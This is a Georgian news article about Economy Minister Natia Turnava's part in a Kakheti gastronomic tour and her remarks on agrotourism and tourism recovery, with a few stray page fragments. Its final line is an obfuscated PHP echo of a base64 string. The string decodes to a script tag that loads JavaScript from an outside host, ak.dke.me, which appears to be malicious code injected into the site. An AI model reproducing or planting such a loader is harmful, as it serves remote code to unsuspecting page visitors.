celsiusi
ავერსი შნაიდერი
ეკონომიკისა და მდგრადი განვითარების მინისტრმა ნათია თურნავამ კახეთის გასტრონომიულ ტურში მიიღო მონაწილეობა. ტურის მიზანი გასტროტურიზმის განვითარების ხელშეწყობა და კახეთის რეგიონის გასტრონომიული შესაძლებლობების პოპულარიზაციაა, რომლის ფარგლებში ცნობილი შეფმზარეულების მონაწილეობით კულინარიული მასტერკლასები გაიმართა.
 
მინისტრის თქმით, ახლა ძალიან მნიშვნელოვანია, რაც შეიძლება სწრაფად მოხდეს ტურიზმის აღდგენა.
 
„პანდემია არამხოლოდ პრობლემა და გამოწვევა იყო, არამედ მან  ახალი შესაძლებლობების გაჩენის ბიძგიც მოგვცა. მათ შორის მნიშვნელოვანია, რომ როგორც ადგილობრივი, ისე საერთაშორისო ტურისტები მონატრებული არიან უნიკალურ ტურისტულ ბაზრებს და ეძებენ რაღაც სიახლეს. ჩვენ, საქართველო კი ვართ ძალიან მდიდარი - სხვადასხვა კუთხით, სადაც არის თავისი უნიკალური წეს-ჩვეულებები, უნიკალური გასტრონომია, კერძები, რომლებიც მხოლოდ ამა თუ იმ რეგიონში შეიძლება დააგემოვნო. ამიტომ  ასეთი გასტრო-ტურების მეშვეობით ვცდილობთ ქართული სამზარეულოს პოპულარიზაციას და გვინდა, რომ წარმოჩინდეს არამხოლოდ უკვე ცნობილი ტურისტული მიზიდულობის ცენტრები და ადგილები, მსხვილი ქალაქები, არამედ მცირე რეგიონული სასტუმროები, მცირე აგროტურისტული ობიექტები“, - აღნიშნა ნათია თურნავამ. 
 
 
 
 
 
მისივე განცხადებით, აგროტურიზმი ჩვენი შემდგომი განვითარების, ტურიზმის სტრატეგიის ერთ-ერთი ქვაკუთხედი იქნება. ამიტომ ძალიან მნიშვნელოვანია, რომ ჩვენი ქვეყნის სოფლის მეურნეობა, სოფლის მეურნეობის პროდუქცია და მასზე მიბმული ტურისტული შესაძლებლობები წარმოვაჩინდეს, რასაც სწორედ ასეთი ღონისძიებები ემსახურება. 
 
გასტროტურში, რომელიც ტურიზმის ეროვნული ადმინისტრაციის ორგანიზებით ჩატარდა, საქართველოს გასტრონომიის ასოციაცია, გასტრონომიული ტურიზმის ბიზნეს ასოციაცია და ქართული მედიის წარმომადგენლები მონაწილეობდნენ.
1856
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");